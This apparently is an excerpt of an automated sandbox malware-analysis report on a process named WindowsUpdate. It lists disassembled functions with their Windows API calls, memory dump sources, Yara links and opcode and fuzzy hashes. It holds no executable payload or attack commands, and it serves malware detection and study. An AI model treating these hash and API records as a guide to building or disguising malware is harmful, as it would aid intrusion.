                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 04E50AE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 086148fc88a956361350e9ad8ae906607042b4a8c1731cdc3b685c3213b87da3
                                                                                                                    • Instruction ID: f5a319c8c3152db5a4b44cfc286bbc1d2621349c2eb36bb2f79be0ae101f7603
                                                                                                                    • Opcode Fuzzy Hash: 086148fc88a956361350e9ad8ae906607042b4a8c1731cdc3b685c3213b87da3
                                                                                                                    • Instruction Fuzzy Hash: 25119135409784AFDB228F55CC84B52FFB4EF46320F0984DEED858B163D275A958CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E50356 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 04E503A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 223599850-0
                                                                                                                    • Opcode ID: b0aad094a38e7e9067c873043120f3eacd39bafde3fd0e9cc761ef00809a0b1b
                                                                                                                    • Instruction ID: 5c1bd1e52c1f3beefe23adfc214ab61bdf788d2f5d41d57ed37b983a2e36020c
                                                                                                                    • Opcode Fuzzy Hash: b0aad094a38e7e9067c873043120f3eacd39bafde3fd0e9cc761ef00809a0b1b
                                                                                                                    • Instruction Fuzzy Hash: 22118E715006009FDB20CF65DD84B76FBE8EF44324F08D4AAEC488B262E2B5E408CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A9F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0248AA4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378638983-0
                                                                                                                    • Opcode ID: 68595c7813846291a8c4178a9884bf9d01a4696f36cb9bc2e3b184e0e85dbf33
                                                                                                                    • Instruction ID: eeb55ccdfd949d3b3ef5362f50d46a2f3536403a163291ebc96875cb41b62f2a
                                                                                                                    • Opcode Fuzzy Hash: 68595c7813846291a8c4178a9884bf9d01a4696f36cb9bc2e3b184e0e85dbf33
                                                                                                                    • Instruction Fuzzy Hash: EC115A32409784AFD7218F55DC85B56FFB4EF46220F08C49AED858B262D3B5A918CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E5104A Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 04E51084
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 51270f6bbc20882c03437927129676d6f7ae2aed3a726f5dc59c563b00094217
                                                                                                                    • Instruction ID: 1a7ce0f0fc62d09584c0ae1be78b7ab7ff9c2fb6f914b920deafccd87fce66bd
                                                                                                                    • Opcode Fuzzy Hash: 51270f6bbc20882c03437927129676d6f7ae2aed3a726f5dc59c563b00094217
                                                                                                                    • Instruction Fuzzy Hash: 37015271A002409FDB20CF69D885766FBD8EF44224F18D4AADD49CF356E675E444CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248BAE6 Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0248BB31
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoadShim
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1475914169-0
                                                                                                                    • Opcode ID: 8879facb1e3c76ba70858cfd172fde6f3bc76c349cada3d90c6999c6ace1cb62
                                                                                                                    • Instruction ID: 5ba6921251f914f74ec8728d9a9a18376cef8541c45767df441ac79f54f3b4c7
                                                                                                                    • Opcode Fuzzy Hash: 8879facb1e3c76ba70858cfd172fde6f3bc76c349cada3d90c6999c6ace1cb62
                                                                                                                    • Instruction Fuzzy Hash: 73018C719006449FDB20EE59D884B26FBE8EF04624F08C09ADD49CB75AD771E408CB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A5D6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0248A61A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 22c2140efc8212e88ab32858b301a05a0d024cd8ad15be0f27ec5031d6a3b8ee
                                                                                                                    • Instruction ID: 7692c8227099076f644f7dc9f11ac92aa8981f9998e42c9ac396f8cba4a032fe
                                                                                                                    • Opcode Fuzzy Hash: 22c2140efc8212e88ab32858b301a05a0d024cd8ad15be0f27ec5031d6a3b8ee
                                                                                                                    • Instruction Fuzzy Hash: A8015B314006409FDB219F95D844B66FFE4EF48720F08C4ABDE895B656D2B6A019CF62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A2FA Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0248A32C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2591292051-0
                                                                                                                    • Opcode ID: 9a9e6c34395fde1aedfc528bb50f3649ca910aac844e98f96c1c625cfffce3a6
                                                                                                                    • Instruction ID: 787e3a41a24ab6a1c29e62924347b05206984aaec830b5a829c62671d06f854f
                                                                                                                    • Opcode Fuzzy Hash: 9a9e6c34395fde1aedfc528bb50f3649ca910aac844e98f96c1c625cfffce3a6
                                                                                                                    • Instruction Fuzzy Hash: 7801DB319002408FDB209F69DC8476AFBE4EF00220F08C0ABDD498F346D6F5A448CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B0BE Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0248B10E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleCtrlHandler
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1513847179-0
                                                                                                                    • Opcode ID: c834ceccbbd04709b40edde0958106e0fa0cc85687ac1d420f9dfa90c606a713
                                                                                                                    • Instruction ID: a7e1db6e86438a0e020cc48ad55ad3f6f05539e71e9a3b085b12032848758d13
                                                                                                                    • Opcode Fuzzy Hash: c834ceccbbd04709b40edde0958106e0fa0cc85687ac1d420f9dfa90c606a713
                                                                                                                    • Instruction Fuzzy Hash: CB016271500600ABD610DF1ADC86B26FBE8FF88B20F14815AED485B741D275F515CBE6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E51A62 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 04E51A9D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 06acbdd45772a6d1b25e1a2cf6c592d7e7ef38c5f4ce711c0794ae5b99dd95fd
                                                                                                                    • Instruction ID: 4ec0ae7cf93b17b630a74b634de7b16c40f7dee43c5f0b0fde97d985536793ef
                                                                                                                    • Opcode Fuzzy Hash: 06acbdd45772a6d1b25e1a2cf6c592d7e7ef38c5f4ce711c0794ae5b99dd95fd
                                                                                                                    • Instruction Fuzzy Hash: 2001D4359006409FDB218F55DC84B66FFE4EF04320F08C5AEDD858B666D271E458DF62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E50AA6 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 04E50AE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: b859535631a27f0bf903980ef6cdcebcca167c8c634508192de66ea1a7ec2598
                                                                                                                    • Instruction ID: 9802815532e8b4592adfebc73fa64eba272444a2b0256238d34d0ae3eb12920d
                                                                                                                    • Opcode Fuzzy Hash: b859535631a27f0bf903980ef6cdcebcca167c8c634508192de66ea1a7ec2598
                                                                                                                    • Instruction Fuzzy Hash: 8901AD35900740DFDB308F55D884B66FFE0EF08324F08D49AED894B266D2B6A418DFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248AA12 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0248AA4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378638983-0
                                                                                                                    • Opcode ID: 34409a3a3904c125f3a8d4694613a125c08308c3dd584fcefa39ae3164ffec92
                                                                                                                    • Instruction ID: 7ee03cb0a1af2e5e2a621ac9cc725d99aac792baeffc59319bc986a5d44d49f4
                                                                                                                    • Opcode Fuzzy Hash: 34409a3a3904c125f3a8d4694613a125c08308c3dd584fcefa39ae3164ffec92
                                                                                                                    • Instruction Fuzzy Hash: 7B01A9318006409FDB209F45D984B2AFBE4EF04720F08C0ABDD894BA56C3B6A448CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A69A Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(?), ref: 0248A6CC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: e7d17ebe90c0b5d8632d6e9e149bb681e3a0c03741675328e6a34ecbe1915afd
                                                                                                                    • Instruction ID: 2fa6f2f5e278e5916efc535981a33d3cdc0e8df090bfecaebb1490267d184a82
                                                                                                                    • Opcode Fuzzy Hash: e7d17ebe90c0b5d8632d6e9e149bb681e3a0c03741675328e6a34ecbe1915afd
                                                                                                                    • Instruction Fuzzy Hash: 75F0AF348006409FDB209F05D88476AFBE4EF44720F18C0DBDD895B35AD2F5A449CEA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0D20 Relevance: .3, Instructions: 305COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad00777fe88e1d1064659a4b1d617e58ff9dd4cd1b1d345ad7c7a0a70ca2ad14
                                                                                                                    • Instruction ID: 993e0d71c6e8db2345189e3fb71c56c6c4020a2e3157a9fb04478b76828c6a4f
                                                                                                                    • Opcode Fuzzy Hash: ad00777fe88e1d1064659a4b1d617e58ff9dd4cd1b1d345ad7c7a0a70ca2ad14
                                                                                                                    • Instruction Fuzzy Hash: 4DF1C634A04209EFCB14DF68D494DEDBBB2FF84308F6545A9D8456F268DB716A4BCB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0D30 Relevance: .3, Instructions: 298COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 966e1e2103997b1724a7d3047b475f06256193ff757ae73d256d112d8ee25fd2
                                                                                                                    • Instruction ID: 3d3a3120ece92ab868f4bb36468a40126c23280ef04d423fd452836e1f239a37
                                                                                                                    • Opcode Fuzzy Hash: 966e1e2103997b1724a7d3047b475f06256193ff757ae73d256d112d8ee25fd2
                                                                                                                    • Instruction Fuzzy Hash: 56E1B534A04209EFCB14DF58D494DEDBBB2FB84308F6545A9D8456F368DB716A4BCB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0898 Relevance: .2, Instructions: 204COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cb222f0962fce0879c3a54b8a812f6dac797cd8f19cc6f9a99e7e11ce836eabb
                                                                                                                    • Instruction ID: 4c63969e96e0b4bf859064c5fc85e7b551090034b372a8adf7e05739614f253a
                                                                                                                    • Opcode Fuzzy Hash: cb222f0962fce0879c3a54b8a812f6dac797cd8f19cc6f9a99e7e11ce836eabb
                                                                                                                    • Instruction Fuzzy Hash: C491C074E05218CFDB14DFA9C894BADBBF2FF49310F1081AAD509AB2A1DB716945CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0887 Relevance: .2, Instructions: 187COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dbcd88b24c314a2e8dd2906f9ac7e8be45a1ac030fda54c0968f6019590a5f9d
                                                                                                                    • Instruction ID: 5d0912a294b523b967ac4fd8861ae728eacd6b4e6dd4a5210ae482bb0c5cde86
                                                                                                                    • Opcode Fuzzy Hash: dbcd88b24c314a2e8dd2906f9ac7e8be45a1ac030fda54c0968f6019590a5f9d
                                                                                                                    • Instruction Fuzzy Hash: 88810674E05218CFDB14DFA9C854BADBBF2FF49310F1481AAD509AB291DB705945CF10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA02C0 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35eed02205a5c359b8dc2fa02876264dc2df44707715e705683f0bf060868a24
                                                                                                                    • Instruction ID: 1ccdf8d970b3720751a54bcca144e648ed29484f0cd83d62b13fadfff67fbb38
                                                                                                                    • Opcode Fuzzy Hash: 35eed02205a5c359b8dc2fa02876264dc2df44707715e705683f0bf060868a24
                                                                                                                    • Instruction Fuzzy Hash: 8051CDB8A04208DFDF01DFA8C481AADBBF1EF0D310F1444A6E906AB361D674A950DF60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA1B19 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2faf72d670c35ef12ccbcfc6dcfaf5480144654db647879b6fbf292f4db79d6
                                                                                                                    • Instruction ID: 405cc1369f98e8d3465006164d9df9948a7446279231bd46a5bd10812b7905e6
                                                                                                                    • Opcode Fuzzy Hash: b2faf72d670c35ef12ccbcfc6dcfaf5480144654db647879b6fbf292f4db79d6
                                                                                                                    • Instruction Fuzzy Hash: ED414C30A42208CFCB19DBB8D4619EEBB72FF8A315F50D469E401372A0CB36A845CF58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA02D0 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9181a1a3a5fe6757ef59e91ed811d4550fdca25a6c02aa9b6f3c51543a5ada8a
                                                                                                                    • Instruction ID: 86b62ea22d6f265681f5ec3225f70a500d7a1bb4e7451c995b59be67bb866901
                                                                                                                    • Opcode Fuzzy Hash: 9181a1a3a5fe6757ef59e91ed811d4550fdca25a6c02aa9b6f3c51543a5ada8a
                                                                                                                    • Instruction Fuzzy Hash: 80419BB8A04208DFDF10DFA8C481AADBBF1FB0D310F1054A5E606AB361D775A950EF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA1B28 Relevance: .1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0f2a346c4a3511197b6c23e279c2d68312a5492475c2dedd66a476beaea9f65
                                                                                                                    • Instruction ID: f36cb4a75be242342f89d6f19a8be964c29c00a0b084d968a4bd7b9694b58cd1
                                                                                                                    • Opcode Fuzzy Hash: a0f2a346c4a3511197b6c23e279c2d68312a5492475c2dedd66a476beaea9f65
                                                                                                                    • Instruction Fuzzy Hash: 0F311831A42208DFCB19DBB8D4619DEB772FF8A311F509469E40137290CB36A845CF68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA3D08 Relevance: .1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4376c1b1acbdab6ea33618a4ec4b2ae6c5b77486662292fcf52990e7e38711b3
                                                                                                                    • Instruction ID: 337c713b7f75474adb41d4db84c3afdaab44e88081c66ba0b73bba81792c6d21
                                                                                                                    • Opcode Fuzzy Hash: 4376c1b1acbdab6ea33618a4ec4b2ae6c5b77486662292fcf52990e7e38711b3
                                                                                                                    • Instruction Fuzzy Hash: FC313670D48208EFCB14DFA8D894AEEBFF4AB4A310F14A4AAD844F3251D774A954DF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0148 Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f04c1bccc1626cbc4ff9c3f105e473da9ac2109587f510043f451b03759cb68d
                                                                                                                    • Instruction ID: bd6e16a44d2a4f2c969aa2b851fda92d1fcb6cfbe4c07086ed488dfa4dcade85
                                                                                                                    • Opcode Fuzzy Hash: f04c1bccc1626cbc4ff9c3f105e473da9ac2109587f510043f451b03759cb68d
                                                                                                                    • Instruction Fuzzy Hash: 36214C30D0414ACFCB15EFA8D8558AD7BB6FF82300B11459BD911AB259DF719A02CF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0254075C Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333814681.0000000002540000.00000040.00000020.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2540000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4eb14ef24311c5b6a8dbb22946b05056931cefea93d3d4277590c63d6cce5b4
                                                                                                                    • Instruction ID: 263ac2e6c9b898579c73fc94cd0fdb4f03a1affec42f15dea6b7d594d2bf163f
                                                                                                                    • Opcode Fuzzy Hash: e4eb14ef24311c5b6a8dbb22946b05056931cefea93d3d4277590c63d6cce5b4
                                                                                                                    • Instruction Fuzzy Hash: D3119334204644DFD319CB14C984F26FBA5BB8971CF34C99DEA491B692CB7BD803CA95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02540724 Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333814681.0000000002540000.00000040.00000020.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2540000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 886696483d9a1cae28fca26a2d56e787dc760802071d6bccaaa9958e30c0ee03
                                                                                                                    • Instruction ID: 995789079b5bd10c71d11cb9c19df9edce337fde4eea06c3271de616492c85e1
                                                                                                                    • Opcode Fuzzy Hash: 886696483d9a1cae28fca26a2d56e787dc760802071d6bccaaa9958e30c0ee03
                                                                                                                    • Instruction Fuzzy Hash: D4212F3410D7C09FD7178B24C990B55BFB1BF47218F2985DAD5898B6A3C73A9806CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04BA0158 Relevance: .1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 44552a140b58db0e6bcd15913d0a7914ee23211424fd429e30bea4c13193140e
                                                                                                                    • Instruction ID: 2af642cfec6a99983854b520d817b33ca4d7837ad4d3f2062ad6f4c7634c5191
                                                                                                                    • Opcode Fuzzy Hash: 44552a140b58db0e6bcd15913d0a7914ee23211424fd429e30bea4c13193140e
                                                                                                                    • Instruction Fuzzy Hash: B0113A30D0010ACFCB05FFA8D8448ADBBBAFB81304B11456A9D116B258DFB19E01CF96
